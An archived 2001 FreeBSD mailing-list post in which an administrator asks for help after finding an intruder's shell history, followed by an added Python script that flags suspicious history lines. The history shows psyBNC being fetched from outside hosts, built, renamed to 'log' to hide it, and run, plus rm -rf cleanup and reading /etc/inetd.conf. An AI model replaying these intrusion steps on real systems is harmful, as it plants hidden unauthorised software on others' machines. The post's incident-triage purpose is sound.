From owner-freebsd-questions Wed Aug 8 18:59:43 2001
Delivered-To: freebsd-questions@freebsd.org
Received: from web12007.mail.yahoo.com (web12007.mail.yahoo.com [216.136.172.215]) by hub.freebsd.org (Postfix) with SMTP id BDE6E37B413 for ; Wed, 8 Aug 2001 18:59:27 -0700 (PDT) (envelope-from bsd2000au@yahoo.com.au)
Message-ID: <20010809015927.36963.qmail@web12007.mail.yahoo.com>
Received: from [61.9.188.204] by web12007.mail.yahoo.com; Thu, 09 Aug 2001 11:59:27 EST
Date: Thu, 9 Aug 2001 11:59:27 +1000 (EST)
From: Keith Spencer
Subject: Yep-I been hacked! Whats psyBNC? Someone installed it
To: fbsd
Sender: owner-freebsd-questions@FreeBSD.ORG

Hi all,

I am on the trail here. I know zero about security (almost). But I found in a user dir all this stuff, and looking in the .bash_history for the user I find the stuff below. I am no genius but I figure I can see some seriously nasty stuff here! Can someone help me make sense of it?

Thanks
Keith

+++ 8< SNIP---------------------------
exit
w
ls
fetch http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
fetch http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
fetch www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
lynx www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
lynx http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
lynx 64.65.0.134/psyBNC2.2.1.tar.gz
ftp ftp.geocities.com
ftp 209.1.225.146
tar zxvf psybnc*
rm -f psybnc.tgz
mv psybnc logs
cd logs
make
./psybnc
ls
make FreeBSD
make bsd
make menuconfig
make
cat psybnc.conf
mv psybnc.conf log.conf
mv psybnc log
./log
ls
mv log psybnc
./psybnc
cd psybnc
ls
./psybnc
pwd
cp psybnc /usr/home/bsd/logs/psybnc
cp psybnc /usr/home/bsd/logs/
cd ..
mv psybnc dir
cd dir
cp psybnc /usr/home/bsd/logs/
cd ..
./psybnc
./psybnc log.conf
kill -9 24639
rm -rf dir
mv psybnc log
./log
./log log.conf
ps x
exit
w
telnet 127.0.0.1
cat /etc/inetd.conf
exit
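
An added triage example, not part of the original message: it walks a shell history, remembers `mv`/`cp` renames, and flags a later `./name` run of a renamed file, as with `mv psybnc log` followed by `./log` in the history above. The `triage` function and its tag names are assumptions made for this example; the sample lines are copied from the history in the message.

```python
import shlex

# Client tools that appear in the history above, plus two common equivalents.
DOWNLOADERS = {"fetch", "lynx", "ftp", "wget", "curl"}

# Sample input: lines copied from the .bash_history quoted in the message.
SAMPLE_HISTORY = """\
fetch http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
lynx 64.65.0.134/psyBNC2.2.1.tar.gz
tar zxvf psybnc*
mv psybnc logs
cd logs
make
mv psybnc.conf log.conf
mv psybnc log
./log
kill -9 24639
rm -rf dir
./log log.conf
cat /etc/inetd.conf
"""

def triage(history):
    """Return (line_no, tag, command) findings for a shell history string."""
    findings = []
    aliases = {}  # new name -> previous name, learned from mv/cp
    for no, line in enumerate(history.splitlines(), 1):
        try:
            argv = shlex.split(line)
        except ValueError:          # unbalanced quotes: fall back to whitespace
            argv = line.split()
        if not argv:
            continue
        cmd = argv[0]
        args = [a for a in argv[1:] if not a.startswith("-")]
        if cmd in DOWNLOADERS and args:
            findings.append((no, "download", line))
        elif cmd in ("mv", "cp") and len(args) == 2 and "/" not in args[1]:
            aliases[args[1]] = args[0]          # remember the rename
        elif cmd.startswith("./") and cmd[2:] in aliases:
            findings.append((no, "run-as:" + aliases[cmd[2:]], line))
        elif cmd == "rm" and any(a.startswith("-") and "r" in a for a in argv[1:]):
            findings.append((no, "cleanup", line))
    return findings

if __name__ == "__main__":
    for no, tag, command in triage(SAMPLE_HISTORY):
        print(f"{no:>3}  {tag:<16} {command}")
```

The history does not record the working directory, so a rename is matched by file name only and a finding is a pointer for manual review, not a verdict.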